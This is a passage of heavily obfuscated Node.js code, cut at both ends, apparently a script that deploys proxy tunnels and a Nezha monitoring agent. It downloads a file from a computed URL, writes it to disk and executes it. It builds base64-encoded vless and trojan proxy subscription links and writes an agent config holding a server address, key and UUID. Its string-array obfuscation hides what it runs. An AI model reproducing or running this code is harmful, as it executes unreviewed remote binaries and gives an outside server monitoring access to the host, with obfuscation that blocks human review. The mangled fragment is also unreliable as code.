return!NEZHA_PORT?_0x4d9e53[_0x431215(_0xafb63d._0x14568e,_0xafb63d._0x85adf3,_0xafb63d._0x589860,_0xafb63d._0x362662)]:_0x4d9e53[_0x431215(_0xafb63d._0x4cfa9c,_0xafb63d._0x1fc0e4,_0xafb63d._0x519627,_0xafb63d._0x40f43b)](_0x4d9e53[_0x53b04a(_0xafb63d._0x1cacdf,_0xafb63d._0x27e747,_0xafb63d._0x38b080,_0xafb63d._0x46e6b3)],_0x4d9e53['lqCQl'])?_0x4d9e53[_0x431215(_0xafb63d._0x4b59c3,_0xafb63d._0xd6ac56,_0xafb63d._0x72213b,_0xafb63d._0x4e6cb9)]:_0x4d9e53[_0x431215(0x44d,0x3b8,0x433,0x3a7)];},downloadFile=async()=>{const _0x234003={_0x1b8b33:0x29,_0x4bab11:0x41,_0x1286c1:0x1b,_0x4a518a:0xf,_0x427c80:0xd6,_0x4ba875:0x74,_0x2a5bde:0x125,_0x278a5f:0x43,_0x5d53cf:0x4,_0x1b296a:0x84,_0x9a01b7:0xa4,_0x3c6046:0x82,_0x2bebd3:0x1f9,_0x4ee60d:0x224,_0x3f96e2:0x1fe,_0x59b213:0x241,_0x21c588:0x32,_0x50599b:0x68,_0x594dcc:0xc0,_0x47ed9e:0x6d,_0x31248b:0x6c,_0x130328:0x5e,_0x2b8b6b:0xb7,_0x47945f:0xcc,_0x20859c:0x1d,_0x34207e:0x151,_0x186607:0x199,_0xbecbe9:0x109,_0x583937:0x146,_0x2d07d9:0x20b,_0x5435c6:0x21f,_0x3c6e8f:0x2a8,_0x58bf0c:0x132,_0x2daf28:0x110,_0x406513:0x27,_0x1e8596:0xc1,_0x398671:0x125,_0x19fa62:0x1cd,_0x3c482e:0x18d,_0x30ac60:0x169,_0x1ee92d:0x233,_0x188f5f:0x4a,_0x224518:0x1f,_0x3d1ded:0x6a,_0x3f4e9c:0x102,_0x46bd1f:0xcb,_0x412f76:0x6a,_0xcdcd47:0xe2,_0x544421:0x5e,_0x1ceb4b:0x160,_0x57ba52:0x13f,_0x4c227f:0x137,_0x5594dc:0x84,_0x5b1c3c:0x12,_0x49e967:0xd9,_0x19f552:0x24,_0x18b33a:0x4a,_0x18fec9:0x9,_0x4f77ad:0x5c,_0x5102bb:0xfe,_0x3bdec1:0xa1,_0x94b282:0x184,_0x31fcdf:0xeb,_0x560bfc:0x1f1,_0x58411b:0x199,_0xd5aadb:0x1f6,_0x55870c:0x1a8,_0x4311c8:0x22c,_0x28ca83:0x20d,_0x3e74ef:0x257,_0x48da58:0x260,_0x3bba37:0x141,_0x5c645b:0xcb,_0x526d75:0x126,_0x331f68:0xad,_0x442506:0x97,_0x31ea0b:0x7,_0x17e652:0x20,_0x432af8:0x15,_0x3ec402:0x61,_0x42289a:0xe4,_0x49f80b:0x48,_0xff53ec:0x8f,_0x419d75:0x3b,_0x541ad6:0x58,_0x596ceb:0xa5,_0x47db16:0xdf,_0x30bcf6:0x7f,_0x4b7692:0xee,_0x517e17:0xcb,_0x322724:0x14c,_0x5e1826:0x1a1,_0x14f273:0x1ba,_0x1543f6:0x133},_0x12f4d2={_0x283886:0xeb,_0x157c2e:0x31,_0xcb9bf9:0x4d,_0x3b7d9f:0x4b9,_0x455068:0x4b8,_0x47811b:0x4ae,_0xf6f68d:0x426,_0x529951:0x54c,_0x2a340e:0x499},_0x483e35={_0x2f90d1:0x81},_0x128bde={_0x32672d:0x11f},_0x3d50cc={_0x129c48:0x103,_0x48dd78:0xf6,_0x45bc9a:0x83},_0x2f1f83={_0x50a1c7:0x183,_0xea9e9c:0x291,_0x12e5b7:0x16b};function _0x2870e3(_0x43e02d,_0x266f83,_0xcd21c9,_0x19de7f){return _0x279f0a(_0x266f83,_0x266f83-_0x2f1f83._0x50a1c7,_0x43e02d-_0x2f1f83._0xea9e9c,_0x19de7f-_0x2f1f83._0x12e5b7);}const _0x24cbc7={'CfBxv':function(_0x49923d,_0x15a9d1){return _0x49923d+_0x15a9d1;},'ryTWb':function(_0x26aaa7,_0x54b7c8){return _0x26aaa7+_0x54b7c8;},'pOIvE':_0x4d9062(0x69,-_0x234003._0x1b8b33,-_0x234003._0x4bab11,-_0x234003._0x1286c1),'ZGrnH':function(_0x3ef322,_0x88e1b6){return _0x3ef322(_0x88e1b6);},'dkAnG':_0x4d9062(-0x67,-0x1d,-0x3b,-_0x234003._0x4a518a),'DTQpi':_0x4d9062(0xb,_0x234003._0x427c80,_0x234003._0x4ba875,_0x234003._0x2a5bde),'jyhkm':function(_0x272dbd,_0x12959c,_0x2c01de,_0x3166f1){return _0x272dbd(_0x12959c,_0x2c01de,_0x3166f1);},'zFEVr':_0x4d9062(_0x234003._0x278a5f,-_0x234003._0x5d53cf,0x66,0xec),'AVjSl':function(_0x2bf391){return _0x2bf391();},'RhpBc':function(_0x1ad0ca,_0x315c1a){return _0x1ad0ca&&_0x315c1a;},'XxPPf':function(_0x574fde,_0x4e0240){return _0x574fde!==_0x4e0240;},'caQRf':_0x4d9062(-_0x234003._0x1b296a,-_0x234003._0x9a01b7,-_0x234003._0x3c6046,-_0x234003._0x2a5bde),'YdbFI':function(_0x3785b8){return _0x3785b8();},'xiXfb':function(_0xc0f9f,_0x24bb73){return _0xc0f9f(_0x24bb73);},'Rjbkp':_0x2870e3(_0x234003._0x2bebd3,_0x234003._0x4ee60d,_0x234003._0x3f96e2,_0x234003._0x59b213),'FOhdM':_0x4d9062(-0xba,-_0x234003._0x21c588,-_0x234003._0x50599b,-_0x234003._0x5d53cf),'RfdfA':_0x4d9062(_0x234003._0x594dcc,0x8,_0x234003._0x47ed9e,_0x234003._0x31248b),'togdV':function(_0x580faf,_0x5dab18){return _0x580faf===_0x5dab18;},'PqzIn':_0x4d9062(-_0x234003._0x130328,-_0x234003._0x2b8b6b,-_0x234003._0x47945f,-_0x234003._0x20859c)};function _0x4d9062(_0x326a6c,_0x456ed0,_0x295d02,_0x35219d){return _0x279f0a(_0x456ed0,_0x456ed0-_0x3d50cc._0x129c48,_0x295d02-_0x3d50cc._0x48dd78,_0x35219d-_0x3d50cc._0x45bc9a);}if(_0x24cbc7[_0x2870e3(_0x234003._0x34207e,_0x234003._0x186607,0x112,_0x234003._0xbecbe9)](!NEZHA_SERVER,!NEZHA_KEY))return;try{if(_0x24cbc7[_0x2870e3(_0x234003._0x583937,0x137,0x183,0x1f0)](_0x24cbc7[_0x2870e3(_0x234003._0x2d07d9,0x205,_0x234003._0x5435c6,_0x234003._0x3c6e8f)],_0x4d9062(-_0x234003._0x58bf0c,-0x8b,-_0x234003._0x3c6046,-_0x234003._0x2daf28))){const _0x5d78c8=_0x4cec29?_0x40e7d0+'-'+_0x5e666d:_0x4dfbe4,_0x573cb3=_0x4d9062(-_0x234003._0x406513,-0xe3,-_0x234003._0x1e8596,-_0x234003._0x398671)+_0x2e5089+'@'+_0x1cde53+':443?encryption=none&security=tls&sni='+_0x1bff70+_0x2870e3(_0x234003._0x19fa62,_0x234003._0x3c482e,_0x234003._0x30ac60,_0x234003._0x1ee92d)+_0x437e04+_0x4d9062(-_0x234003._0x188f5f,_0x234003._0x224518,_0x234003._0x3d1ded,_0x234003._0x3f4e9c)+_0x43d746+'#'+_0x5d78c8,_0x3bef83='trojan://'+_0x26950d+'@'+_0x368838+':443?security=tls&sni='+_0x450746+'&fp=chrome&type=ws&host='+_0x4fcd99+_0x4d9062(_0x234003._0x4bab11,_0x234003._0x46bd1f,_0x234003._0x412f76,-0x7)+_0x58c603+'#'+_0x5d78c8,_0x2b0c55=_0x24cbc7['CfBxv'](_0x24cbc7[_0x2870e3(_0x234003._0xcdcd47,_0x234003._0x544421,_0x234003._0x1ceb4b,_0x234003._0x57ba52)](_0x573cb3,'\x0a'),_0x3bef83),_0x34eb20=_0x4f3f4a['from'](_0x2b0c55)['toString']('base64'),_0x1fadbb={};_0x1fadbb[_0x4d9062(-0x97,-_0x234003._0x4c227f,-_0x234003._0x5594dc,-_0x234003._0x5b1c3c)]=_0x24cbc7[_0x4d9062(_0x234003._0x49e967,-_0x234003._0x19f552,0x3f,-_0x234003._0x278a5f)],_0x500a34[_0x4d9062(-_0x234003._0x18b33a,_0x234003._0x18fec9,_0x234003._0x4f77ad,0x3f)](0x12a3+-0xab9+-0x722,_0x1fadbb),_0x2b32e5[_0x4d9062(-_0x234003._0x5102bb,-0x48,-_0x234003._0x3bdec1,-0x152)](_0x24cbc7[_0x2870e3(_0x234003._0x94b282,_0x234003._0x31fcdf,0x19b,_0x234003._0x560bfc)](_0x34eb20,'\x0a'));}else{const _0xebe75f=_0x24cbc7[_0x2870e3(_0x234003._0x58411b,_0x234003._0xd5aadb,_0x234003._0x55870c,_0x234003._0x4311c8)](getDownloadUrl),_0x13ca03=await _0x24cbc7['xiXfb'](axios,{'method':_0x24cbc7[_0x2870e3(_0x234003._0x28ca83,_0x234003._0x3e74ef,0x1d5,_0x234003._0x48da58)],'url':_0xebe75f,'responseType':_0x24cbc7[_0x2870e3(_0x234003._0x3bba37,_0x234003._0x5c645b,_0x234003._0x526d75,_0x234003._0x331f68)]}),_0x2f46d3=fs[_0x4d9062(-_0x234003._0x442506,_0x234003._0x31ea0b,0x1c,-0x6)](_0x24cbc7['RfdfA']);return _0x13ca03[_0x4d9062(-0x7c,0x52,-_0x234003._0x17e652,_0x234003._0x432af8)][_0x4d9062(_0x234003._0x3ec402,-_0x234003._0x42289a,-_0x234003._0x49f80b,-_0x234003._0xff53ec)](_0x2f46d3),new Promise((_0x2c27fa,_0x167b64)=>{const _0x3fb8b0={_0x1b1345:0x1c5,_0x21b311:0x112,_0x1047c8:0xea,_0x10a13c:0x16d,_0x57e8d4:0x179,_0xeeedaa:0x89,_0x27cbf1:0x1d1,_0x34870c:0x154,_0x3c0bf1:0x136,_0x84a8c5:0x21c,_0xbf8b71:0x55f,_0x44ac1b:0x5be,_0x63dbdf:0x668,_0x16ac55:0x5d9,_0x32b9a9:0x4f6,_0x2e3520:0x557,_0x2aaaf9:0x4fa,_0x30430f:0x4f3,_0x36b88e:0x5f3,_0x540588:0x4cd,_0x1c4d4e:0x52b,_0x4a9ffe:0x5a2,_0x50d962:0x4ad},_0x4f7b8c={_0x49f3ed:0xee,_0x10b330:0xfe,_0x433a63:0x95,_0x39e6da:0x11c};function _0x1133f5(_0x3ecc71,_0x2579b0,_0x4147ce,_0x320eb4){return _0x2870e3(_0x4147ce-0x2c5,_0x320eb4,_0x4147ce-0x192,_0x320eb4-_0x128bde._0x32672d);}const _0x34e4a8={'PMOdU':function(_0x4f7dec,_0x5b6fb5,_0x173eee,_0x4a936a){const _0x184036={_0x1caf50:0x131};function _0x47aa7e(_0x4e3b2a,_0x3f48aa,_0x3be30a,_0x239677){return _0x84e0(_0x239677- -_0x184036._0x1caf50,_0x4e3b2a);}return _0x24cbc7[_0x47aa7e(_0x4f7b8c._0x49f3ed,_0x4f7b8c._0x10b330,_0x4f7b8c._0x433a63,_0x4f7b8c._0x39e6da)](_0x4f7dec,_0x5b6fb5,_0x173eee,_0x4a936a);},'TkwOU':_0x24cbc7[_0x454d38(0x39,-_0x12f4d2._0x283886,-_0x12f4d2._0x157c2e,-_0x12f4d2._0xcb9bf9)]};_0x2f46d3['on'](_0x1133f5(_0x12f4d2._0x3b7d9f,0x42c,_0x12f4d2._0x455068,_0x12f4d2._0x47811b),()=>{const _0x48cb18={_0x5c3f25:0x7a,_0x489c2b:0x6b,_0x1fe3e5:0xb4},_0x4c0a07={_0x1fd988:0x58,_0x21dbe1:0x5,_0x4a6e41:0x198},_0x397222={_0x14c8e6:0x16c,_0x35dee7:0x1d8,_0x15a07f:0x650},_0x266e21={_0x30b839:0x1cd,_0x33a043:0x7c,_0x4d489d:0x2a8},_0x35266b={_0x1e8247:0x162,_0x51e048:0x144,_0x28e260:0x1b0},_0x1e106e={'DCQwb':function(_0x4b4488,_0xc78732){const _0x363489={_0x421c74:0x1bf};function _0x8451cd(_0x5bf631,_0x2f7210,_0x277db2,_0x20a6f9){return _0x84e0(_0x2f7210- -_0x363489._0x421c74,_0x277db2);}return _0x24cbc7[_0x8451cd(_0x35266b._0x1e8247,_0x35266b._0x51e048,0x113,_0x35266b._0x28e260)](_0x4b4488,_0xc78732);}};function _0x473c9e(_0x46b201,_0x278267,_0x529850,_0x352d50){return _0x1133f5(_0x46b201-_0x266e21._0x30b839,_0x278267-_0x266e21._0x33a043,_0x46b201- -_0x266e21._0x4d489d,_0x278267);}function _0x13c570(_0x20d2e2,_0x511700,_0x1c99db,_0x54a6c5){return _0x454d38(_0x20d2e2-_0x397222._0x14c8e6,_0x511700-_0x397222._0x35dee7,_0x1c99db,_0x511700-_0x397222._0x15a07f);}if(_0x473c9e(_0x3fb8b0._0x1b1345,0x14b,_0x3fb8b0._0x21b311,0x1ac)===_0x24cbc7[_0x473c9e(_0x3fb8b0._0x1047c8,_0x3fb8b0._0x10a13c,_0x3fb8b0._0x57e8d4,_0x3fb8b0._0xeeedaa)]){const _0x163571={_0x2ab81b:0x175,_0x4b0f0a:0x1b5,_0x47792a:0x27e,_0x4d77b5:0x3a3,_0x2d07c4:0x2c0,_0xd3a12c:0x3e1,_0x4085b0:0x318,_0xa1a02c:0x2c3,_0x591c99:0x3aa,_0x2b679d:0x355,_0x41c6dc:0x2aa,_0x49adb0:0x21c},_0x265a7f={};_0x265a7f[_0x473c9e(_0x3fb8b0._0x27cbf1,_0x3fb8b0._0x34870c,_0x3fb8b0._0x3c0bf1,_0x3fb8b0._0x84a8c5)]=_0x13c570(_0x3fb8b0._0xbf8b71,_0x3fb8b0._0x44ac1b,0x61e,_0x3fb8b0._0x63dbdf);const _0x145d69=_0x265a7f;_0x34e4a8[_0x13c570(_0x3fb8b0._0x16ac55,0x584,_0x3fb8b0._0x32b9a9,_0x3fb8b0._0x2e3520)](_0x501600,_0xcb3f8d,{'shell':_0x34e4a8['TkwOU']},_0x198cbc=>{const _0xff464={_0x4af5b4:0x5a,_0x3ad93a:0x15f};function _0x40f88f(_0x40e321,_0x1882cc,_0x13a82b,_0x281654){return _0x473c9e(_0x281654-0x1d,_0x1882cc,_0x13a82b-0x6b,_0x281654-0xe4);}function _0x14978c(_0x1ca7d4,_0x1f276a,_0x564079,_0x447ab3){return _0x473c9e(_0x1f276a-0x191,_0x447ab3,_0x564079-_0xff464._0x4af5b4,_0x447ab3-_0xff464._0x3ad93a);}if(_0x198cbc)_0xd06ab[_0x40f88f(_0x163571._0x2ab81b,_0x163571._0x4b0f0a,_0x163571._0x47792a,0x20e)](_0x145d69[_0x14978c(_0x163571._0x4d77b5,0x362,_0x163571._0x2d07c4,_0x163571._0xd3a12c)],_0x198cbc);else _0x13bcd6[_0x14978c(0x33e,_0x163571._0x4085b0,_0x163571._0xa1a02c,_0x163571._0x591c99)](_0x14978c(_0x163571._0x2b679d,_0x163571._0x41c6dc,0x29a,_0x163571._0x49adb0));});}else console[_0x13c570(_0x3fb8b0._0x2aaaf9,0x59e,_0x3fb8b0._0x30430f,_0x3fb8b0._0x36b88e)]('npm\x20download\x20successfully'),exec(_0x24cbc7[_0x13c570(_0x3fb8b0._0x540588,_0x3fb8b0._0x1c4d4e,_0x3fb8b0._0x4a9ffe,_0x3fb8b0._0x50d962)],_0x4b7df0=>{function _0x2fda7b(_0x31ae89,_0x13dc67,_0x28b3c5,_0x48c53a){return _0x473c9e(_0x31ae89- -_0x4c0a07._0x1fd988,_0x48c53a,_0x28b3c5-_0x4c0a07._0x21dbe1,_0x48c53a-_0x4c0a07._0x4a6e41);}if(_0x4b7df0)_0x1e106e[_0x2fda7b(_0x48cb18._0x5c3f25,0x67,_0x48cb18._0x489c2b,_0x48cb18._0x1fe3e5)](_0x167b64,_0x4b7df0);_0x2c27fa();});});function _0x454d38(_0x27de2c,_0x389fca,_0x4c481c,_0x36196d){return _0x4d9062(_0x27de2c-0x1be,_0x4c481c,_0x36196d- -_0x483e35._0x2f90d1,_0x36196d-0x42);}_0x2f46d3['on'](_0x1133f5(_0x12f4d2._0xf6f68d,_0x12f4d2._0x529951,_0x12f4d2._0x2a340e,0x3f1),_0x167b64);});}}catch(_0x194191){if(_0x24cbc7[_0x4d9062(-0x1e,_0x234003._0x419d75,-_0x234003._0x541ad6,-_0x234003._0x596ceb)](_0x24cbc7[_0x2870e3(0x124,_0x234003._0x47db16,_0x234003._0x30bcf6,_0x234003._0x4b7692)],_0x4d9062(-0x6d,-_0x234003._0x517e17,-_0x234003._0x47945f,-_0x234003._0x322724)))throw _0x194191;else _0x24cbc7[_0x2870e3(0x1ac,_0x234003._0x5e1826,_0x234003._0x14f273,_0x234003._0x1543f6)](_0x4b3e8a);}},runnz=async()=>{const _0x2dcd7c={_0x5f53be:0x275,_0x710c40:0x26a,_0x1d4f40:0x34c,_0x1b51b6:0x30b,_0x4df897:0x2b5,_0x6f7ff5:0x437,_0x507f27:0x4be,_0x97b642:0x526,_0x142d22:0x53a,_0x4435fb:0x499,_0x3f3147:0x20f,_0x39ea02:0x1c6,_0x11a697:0x254,_0x8dc73e:0x5ad,_0x5a7de3:0x5d0,_0x2c4746:0x20a,_0x35c8e2:0x2a2,_0x4cbbab:0x50c,_0x4d6e76:0x49d,_0x53c028:0x5c2,_0x27663f:0x539,_0x168518:0x500,_0x2a9240:0x5ae,_0x54391e:0x315,_0x4adb48:0x2aa,_0x1ea6fe:0x29e,_0x3a9457:0x2d5,_0x35cf77:0x2c2,_0x3d1e24:0x419,_0x59b890:0x513,_0x167ce8:0x2bb,_0x4677d9:0x29f,_0x40bc59:0x1e7,_0x21ddb4:0x295,_0x327658:0x55b,_0x4002c1:0x51b,_0x1d3412:0x55d,_0xa6e5bf:0x527,_0x2cbbc2:0x48a,_0x2cbc93:0x4c5,_0x1b7ab6:0x4a0,_0x434cbc:0x30b,_0x18d066:0x396,_0x4e1698:0x2e5,_0x19c183:0x205,_0x2ccfa5:0x1c3,_0x338325:0x512,_0x557f4f:0x476,_0x4b4f08:0x585,_0x1ec653:0x584,_0x589292:0x53c,_0x534d29:0x4ec,_0x3dbc2d:0x33d,_0x3f9b7c:0x21e,_0x436a92:0x302,_0x530013:0x2cd,_0x178f15:0x521,_0x5c5c70:0x580,_0x2e1d83:0x5b7,_0x288f68:0x337,_0x58e3fd:0x27a,_0x3a4021:0x287,_0x272f40:0x4c1,_0x37011c:0x4dc,_0x5038d9:0x477,_0x111332:0x43d,_0x4aa8f6:0x538,_0x4b400d:0x57c,_0x5ab929:0x567,_0x410288:0x5b8,_0x4634ec:0x5b4,_0x1e2137:0x661,_0x219333:0x300,_0x5be0d8:0x215,_0x242046:0x304,_0x2c0c8a:0x2ad,_0x250e4d:0x5d8,_0x3f8edf:0x58d,_0x1aadd7:0x569,_0x4f0058:0x605,_0x58e284:0x33b,_0x4536e7:0x30c,_0x3c0f8a:0x288,_0x11e3be:0x59e,_0x1569fb:0x62b,_0x38ca4f:0x4e6,_0x506c86:0x301,_0x38b87d:0x1f3,_0x28cef2:0x32b,_0x39f18c:0x287,_0x5b95be:0x59f,_0x259461:0x547,_0x5d983b:0x5ee,_0xf7ddec:0x334,_0xcd7837:0x359,_0x2f75b3:0x306,_0x266dde:0x208,_0x282f3a:0x29a,_0xbe0d7a:0x1ae,_0x3abe60:0x191,_0x22d797:0x210,_0x3cb4c6:0x200,_0x4c1b9f:0x1d7,_0x21d72d:0x2b7,_0x337eda:0x388,_0x48e6d6:0x2a4,_0x5f0408:0x4b2,_0xc982bc:0x474,_0x16ca30:0x4cb,_0x41b889:0x4ac,_0x2590a7:0x45e,_0x520e50:0x3f0,_0x5a513e:0x47c,_0x34b98a:0x43b,_0x5cec4d:0x4a6,_0x454f01:0x4c9,_0x1f18e8:0x2b5,_0x1c1979:0x1f9,_0x1cd6f3:0x278,_0x5b9175:0x26d,_0x1fb96d:0x353,_0x4943cb:0x2fe,_0x2ba9de:0x2e4,_0xe102b0:0x525,_0x27041b:0x5bc,_0x4f1abf:0x4c2,_0x528ddf:0x4eb,_0xad774a:0x524,_0x548b1d:0x50d,_0x7ec938:0x4b1,_0x4043fa:0x4d9,_0x1c9056:0x1fd,_0x20e919:0x256,_0x4ed0af:0x29e,_0x4bd19b:0x25f,_0x1d98a8:0x4ea,_0x479cd9:0x510,_0x3137a4:0x45f,_0x391078:0x4fc,_0x215cd6:0x223,_0x51bf78:0x283,_0x21f160:0x24c,_0x294331:0x257,_0xa98415:0x267,_0x3da21c:0x4f3,_0x348780:0x582,_0x5ad270:0x542,_0x415f7b:0x1c9},_0x1e4687={_0x155eac:0x3cf,_0x21086c:0x50f,_0x5d3339:0x3f5,_0xc53cc6:0x48e,_0x1bfd1a:0x415,_0x17879c:0x406},_0x50501c={_0x27ce4c:0x139,_0x171b84:0x10},_0x46fb46={_0x474da9:0x3bc,_0x3a1b71:0x1c8},_0x212ed5={_0x5383c2:0x1aa,_0x2df196:0x104},_0x489a2d={'PPYlF':_0x5128aa(0x2e0,0x2ec,_0x2dcd7c._0x5f53be,_0x2dcd7c._0x710c40),'SkCKa':function(_0x59edcf,_0x406c20){return _0x59edcf+_0x406c20;},'gTmZv':_0x5128aa(0x2e9,_0x2dcd7c._0x1d4f40,_0x2dcd7c._0x1b51b6,_0x2dcd7c._0x4df897),'HqTAZ':_0x3a84f9(_0x2dcd7c._0x6f7ff5,0x4aa,0x4c0,_0x2dcd7c._0x507f27),'TSgit':function(_0x3367cd,_0x2fb875,_0x5175cd){return _0x3367cd(_0x2fb875,_0x5175cd);},'HiGot':_0x3a84f9(_0x2dcd7c._0x97b642,_0x2dcd7c._0x142d22,_0x2dcd7c._0x4435fb,0x4d6),'NThHJ':_0x5128aa(_0x2dcd7c._0x3f3147,_0x2dcd7c._0x39ea02,0x24b,_0x2dcd7c._0x11a697),'uAvNt':function(_0xcc26bf,_0x591171){return _0xcc26bf!==_0x591171;},'BQbpx':function(_0x376292){return _0x376292();},'OlyMm':'443','bcyUC':'8443','PdeCr':'2087','BarDs':'2083','ijlKp':_0x3a84f9(0x65a,_0x2dcd7c._0x8dc73e,_0x2dcd7c._0x5a7de3,0x60f),'PBKYx':function(_0x5c00ce,_0x7ca5b1){return _0x5c00ce&&_0x7ca5b1;},'MEFNj':function(_0x571d95,_0x4119b0){return _0x571d95!==_0x4119b0;},'UXvBt':'ulyKS','xzCcf':_0x5128aa(0x233,0x353,_0x2dcd7c._0x2c4746,_0x2dcd7c._0x35c8e2),'oFduz':function(_0x8fa295,_0x30e1d3){return _0x8fa295&&_0x30e1d3;},'iRcUG':function(_0x2f1732,_0x8c9a1c){return _0x2f1732===_0x8c9a1c;},'anJil':'ZlKaU','rglHQ':_0x3a84f9(0x48e,_0x2dcd7c._0x4cbbab,0x4ab,_0x2dcd7c._0x4d6e76),'AUxWz':function(_0x216539,_0xefbea7,_0x565a45,_0xadfbd5){return _0x216539(_0xefbea7,_0x565a45,_0xadfbd5);},'RmbmQ':_0x3a84f9(_0x2dcd7c._0x53c028,_0x2dcd7c._0x27663f,_0x2dcd7c._0x168518,_0x2dcd7c._0x2a9240),'MNcWZ':'yxNnu'};try{const _0x49db78=_0x489a2d[_0x5128aa(_0x2dcd7c._0x54391e,0x356,_0x2dcd7c._0x4adb48,0x337)](execSync,_0x489a2d['HiGot'],{'encoding':_0x489a2d[_0x5128aa(_0x2dcd7c._0x1ea6fe,_0x2dcd7c._0x3a9457,0x2ab,_0x2dcd7c._0x35cf77)]});if(_0x489a2d[_0x3a84f9(0x552,0x4c1,_0x2dcd7c._0x3d1e24,_0x2dcd7c._0x59b890)](_0x49db78['trim'](),'')){console[_0x5128aa(_0x2dcd7c._0x167ce8,_0x2dcd7c._0x4677d9,_0x2dcd7c._0x40bc59,_0x2dcd7c._0x21ddb4)](_0x3a84f9(_0x2dcd7c._0x327658,0x586,_0x2dcd7c._0x4002c1,_0x2dcd7c._0x1d3412));return;}}catch(_0x9cac1a){}await _0x489a2d['BQbpx'](downloadFile);let _0x293957='',_0x16e066=[_0x489a2d[_0x3a84f9(_0x2dcd7c._0xa6e5bf,_0x2dcd7c._0x2cbbc2,_0x2dcd7c._0x2cbc93,_0x2dcd7c._0x1b7ab6)],_0x489a2d[_0x5128aa(_0x2dcd7c._0x434cbc,0x311,_0x2dcd7c._0x18d066,_0x2dcd7c._0x4e1698)],_0x5128aa(_0x2dcd7c._0x19c183,0x2e1,_0x2dcd7c._0x2ccfa5,0x22e),_0x489a2d[_0x3a84f9(_0x2dcd7c._0x338325,_0x2dcd7c._0x557f4f,0x42f,0x49b)],_0x489a2d[_0x3a84f9(_0x2dcd7c._0x4b4f08,_0x2dcd7c._0x1ec653,_0x2dcd7c._0x589292,_0x2dcd7c._0x534d29)],_0x489a2d[_0x5128aa(_0x2dcd7c._0x3dbc2d,_0x2dcd7c._0x3f9b7c,_0x2dcd7c._0x436a92,_0x2dcd7c._0x530013)]];function _0x3a84f9(_0xefa573,_0x318f20,_0xbed147,_0x1052ee){return _0x421fd5(_0xefa573-_0x212ed5._0x5383c2,_0xefa573,_0x318f20-0x64f,_0x1052ee-_0x212ed5._0x2df196);}if(_0x489a2d[_0x3a84f9(0x5a2,_0x2dcd7c._0x178f15,_0x2dcd7c._0x5c5c70,_0x2dcd7c._0x2e1d83)](NEZHA_SERVER,NEZHA_PORT)&&NEZHA_KEY){if(_0x489a2d['MEFNj']('UrNUF',_0x489a2d['UXvBt'])){const _0x174084=_0x16e066[_0x5128aa(_0x2dcd7c._0x288f68,0x24e,_0x2dcd7c._0x58e3fd,_0x2dcd7c._0x3a4021)](NEZHA_PORT)?_0x489a2d['xzCcf']:'';_0x293957=_0x3a84f9(_0x2dcd7c._0x272f40,_0x2dcd7c._0x37011c,_0x2dcd7c._0x5038d9,_0x2dcd7c._0x111332)+NEZHA_SERVER+':'+NEZHA_PORT+_0x3a84f9(_0x2dcd7c._0x4aa8f6,0x52f,_0x2dcd7c._0x4b400d,_0x2dcd7c._0x272f40)+NEZHA_KEY+'\x20'+_0x174084+_0x3a84f9(_0x2dcd7c._0x5ab929,_0x2dcd7c._0x410288,_0x2dcd7c._0x4634ec,_0x2dcd7c._0x1e2137);}else return _0x489a2d[_0x5128aa(_0x2dcd7c._0x219333,_0x2dcd7c._0x5be0d8,_0x2dcd7c._0x242046,_0x2dcd7c._0x2c0c8a)];}else{if(_0x489a2d[_0x3a84f9(_0x2dcd7c._0x250e4d,_0x2dcd7c._0x3f8edf,_0x2dcd7c._0x1aadd7,_0x2dcd7c._0x4f0058)](NEZHA_SERVER,NEZHA_KEY)){if(!NEZHA_PORT){if(_0x489a2d[_0x5128aa(0x277,_0x2dcd7c._0x58e284,_0x2dcd7c._0x4536e7,_0x2dcd7c._0x3c0f8a)](_0x489a2d[_0x3a84f9(_0x2dcd7c._0x178f15,_0x2dcd7c._0x11e3be,_0x2dcd7c._0x1569fb,0x5af)],_0x3a84f9(0x4fe,0x546,0x4a2,_0x2dcd7c._0x38ca4f))){const _0x5558c6=NEZHA_SERVER[_0x5128aa(_0x2dcd7c._0x506c86,_0x2dcd7c._0x38b87d,_0x2dcd7c._0x28cef2,_0x2dcd7c._0x39f18c)](':')?NEZHA_SERVER[_0x3a84f9(_0x2dcd7c._0x5b95be,0x59d,_0x2dcd7c._0x259461,_0x2dcd7c._0x5d983b)](':')[_0x5128aa(0x399,_0x2dcd7c._0xf7ddec,_0x2dcd7c._0xcd7837,_0x2dcd7c._0x2f75b3)]():'',_0x2f09c1=_0x16e066[_0x5128aa(0x289,_0x2dcd7c._0x266dde,_0x2dcd7c._0x282f3a,_0x2dcd7c._0x3a4021)](_0x5558c6)?_0x489a2d[_0x5128aa(_0x2dcd7c._0xbe0d7a,_0x2dcd7c._0x3abe60,0x174,_0x2dcd7c._0x22d797)]:_0x5128aa(0x278,_0x2dcd7c._0x3cb4c6,_0x2dcd7c._0x4c1b9f,0x1e9),_0x272714=_0x5128aa(_0x2dcd7c._0x21d72d,_0x2dcd7c._0x337eda,_0x2dcd7c._0x48e6d6,0x328)+NEZHA_KEY+_0x3a84f9(_0x2dcd7c._0x5f0408,_0x2dcd7c._0xc982bc,0x41f,_0x2dcd7c._0x16ca30)+NEZHA_SERVER+_0x3a84f9(_0x2dcd7c._0x41b889,_0x2dcd7c._0x2590a7,_0x2dcd7c._0x520e50,_0x2dcd7c._0x5a513e)+_0x2f09c1+'\x0ause_gitee_to_upgrade:\x20false\x0ause_ipv6_country_code:\x20false\x0auuid:\x20'+UUID;fs[_0x3a84f9(_0x2dcd7c._0x34b98a,_0x2dcd7c._0x5cec4d,0x532,_0x2dcd7c._0x454f01)](_0x5128aa(_0x2dcd7c._0x1f18e8,_0x2dcd7c._0x1c1979,_0x2dcd7c._0x1cd6f3,_0x2dcd7c._0x5b9175),_0x272714);}else{const _0x319b7c=_0x26be0c[_0x4fe11a];_0x523de7+=-0x5*0x31b+-0x26d6+0x1*0x365e,_0x3a6b1f=_0x481a71[_0x5128aa(_0x2dcd7c._0x1fb96d,_0x2dcd7c._0x58e284,_0x2dcd7c._0x4943cb,_0x2dcd7c._0x2ba9de)](_0xbf4846,_0x489a2d[_0x3a84f9(_0x2dcd7c._0xe102b0,_0x2dcd7c._0x27041b,0x66c,0x52d)](_0x4aa086,_0x319b7c))[_0x3a84f9(_0x2dcd7c._0x4f1abf,_0x2dcd7c._0x528ddf,_0x2dcd7c._0xad774a,_0x2dcd7c._0x548b1d)](),_0x1fc510+=_0x319b7c;}}_0x293957=_0x3a84f9(_0x2dcd7c._0x7ec938,_0x2dcd7c._0x4043fa,0x562,0x54a);}else{console['log'](_0x5128aa(_0x2dcd7c._0x1c9056,_0x2dcd7c._0x20e919,_0x2dcd7c._0x4ed0af,_0x2dcd7c._0x4bd19b));return;}}function 